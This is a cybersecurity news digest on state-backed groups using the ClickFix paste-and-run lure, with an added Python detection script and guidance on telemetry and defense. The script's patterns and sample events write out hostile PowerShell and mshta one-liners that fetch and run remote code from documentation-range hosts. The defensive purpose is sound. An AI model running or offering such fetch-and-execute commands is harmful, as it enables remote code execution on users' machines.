State-Sponsored Hackers Embrace ClickFix Social Engineering for Espionage Campaigns

Threat actors from North Korea (Kimsuky), Iran (MuddyWater), and Russia (APT28, UNK_RemoteRogue) are increasingly using the “ClickFix” tactic in espionage operations. ClickFix presents the victim with a fake error, CAPTCHA or “verification” prompt on an attacker-controlled website and instructs them to copy a command and paste it into the Windows Run dialog or a PowerShell window. The victim, not an exploit, launches the malicious PowerShell, so no exploit code or malicious file has to reach the endpoint before execution begins. Between late 2024 and early 2025, these campaigns targeted think tanks, Middle Eastern organizations, and arms manufacturers. The attackers built the trust needed for that paste-and-run step with spoofed emails and decoy documents, and used the manually triggered execution to establish persistent access.
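Because the victim launches the command, the first reliable trace of a ClickFix infection is a process-creation event rather than a file on disk. The following is an added example of the detection logic a practitioner would run over that telemetry; it is not code from the original article or from Proofpoint. The record layout mirrors Windows Security event 4688 / Sysmon event 1 (parent image, new image, command line), and the field names, user names, hosts and command lines are constructed for illustration.

```python
"""Flag ClickFix-style executions in Windows process-creation telemetry.

Added example for this digest, not code from the original article or from
Proofpoint. The record layout mirrors the fields of Windows Security event 4688
/ Sysmon event 1 (parent image, new image, command line); the field names,
user names and command lines below are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Parents a user-pasted command is launched from. explorer.exe is the parent of
# the Win+R Run dialog and of double-clicked items; cmd.exe is included because
# pasted one-liners often take the form "cmd /c ...".
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Fetch-and-execute idioms seen in ClickFix lures. Each entry: (rule name, regex).
INDICATORS = [
    ("download_and_execute", re.compile(
        r"(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)"
        r".*\|\s*(iex|invoke-expression)", re.I)),
    ("remote_hta", re.compile(r"mshta(\.exe)?\s+https?://", re.I)),
    ("encoded_command", re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("curl_pipe_shell", re.compile(r"\bcurl\b.*\|\s*(iex|cmd|powershell)", re.I)),
]


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


def basename(path: str) -> str:
    """Last path component, lower-cased, for either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> tuple[bool, list[str]]:
    """Return (suspicious, matched rule names) for one process-creation event.

    Both conditions are required: a script host spawned from an interactive
    parent AND a fetch-and-execute idiom on the command line. Encoded or hidden
    PowerShell alone is common in scheduled tasks and management agents, but
    those are not children of explorer.exe.
    """
    matched = [name for name, rx in INDICATORS if rx.search(ev.command_line)]
    interactive_spawn = (basename(ev.parent_image) in INTERACTIVE_PARENTS
                         and basename(ev.image) in SCRIPT_HOSTS)
    return interactive_spawn and bool(matched), matched


def detect(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, list[str]]]:
    """Return the events that look like ClickFix executions, with their rules."""
    hits = []
    for ev in events:
        suspicious, rules = score_event(ev)
        if suspicious:
            hits.append((ev, rules))
    return hits


# Constructed sample telemetry (hosts use documentation address space).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 1. Classic ClickFix: Run dialog -> hidden PowerShell fetching a script.
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -c "iwr http://203.0.113.10/fix.txt | iex"', "CORP\\analyst"),
    # 2. Encoded PowerShell from a scheduled task: noisy, but not interactive.
    ProcessEvent(r"C:\Windows\System32\svchost.exe", PS,
                 "powershell.exe -NoProfile -EncodedCommand RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==",
                 "NT AUTHORITY\\SYSTEM"),
    # 3. Benign interactive use.
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 "powershell.exe -NoExit -Command Get-Process", "CORP\\analyst"),
    # 4. Fake "verification" page telling the user to run a remote HTA.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://203.0.113.5/verify.hta", "CORP\\analyst"),
    # 5. "cmd /c" one-liner that stages PowerShell via WebClient.
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS,
                 "powershell -c \"(New-Object Net.WebClient).DownloadString('http://203.0.113.7/x')|iex\"",
                 "CORP\\analyst"),
]

if __name__ == "__main__":
    for ev, rules in detect(SAMPLE_EVENTS):
        print(f"[ClickFix?] {ev.user}: {basename(ev.parent_image)} -> {basename(ev.image)} "
              f"rules={rules} cmd={ev.command_line}")
```

Events 1, 4 and 5 are flagged; event 2 matches an indicator but has a non-interactive parent, and event 3 is an ordinary shell session. On a real host the pasted text also survives in the user's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which is worth pulling during triage to recover the exact command even when the process log has rolled over.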

Expert Analysis:

ClickFix is the latest proof that technical protections alone cannot defeat social engineering. Attackers bypass security tools not by force but by persuasion, exploiting human reflexes instead of software flaws. When a fake prompt can open a backdoor as reliably as a zero-day exploit, defense has to move beyond reactive patching to conditioning users never to paste a command they did not write. The technique is not invisible, though: every ClickFix execution begins with an interactive process such as explorer.exe or the Run dialog spawning PowerShell or cmd.exe with a command line that fetches and runs remote content, which is exactly the pattern that process-creation logging and a simple detection rule can catch, and the Run dialog itself can be disabled by Group Policy where users have no need for it.

Read the full article here.

ZENDATA Cybersecurity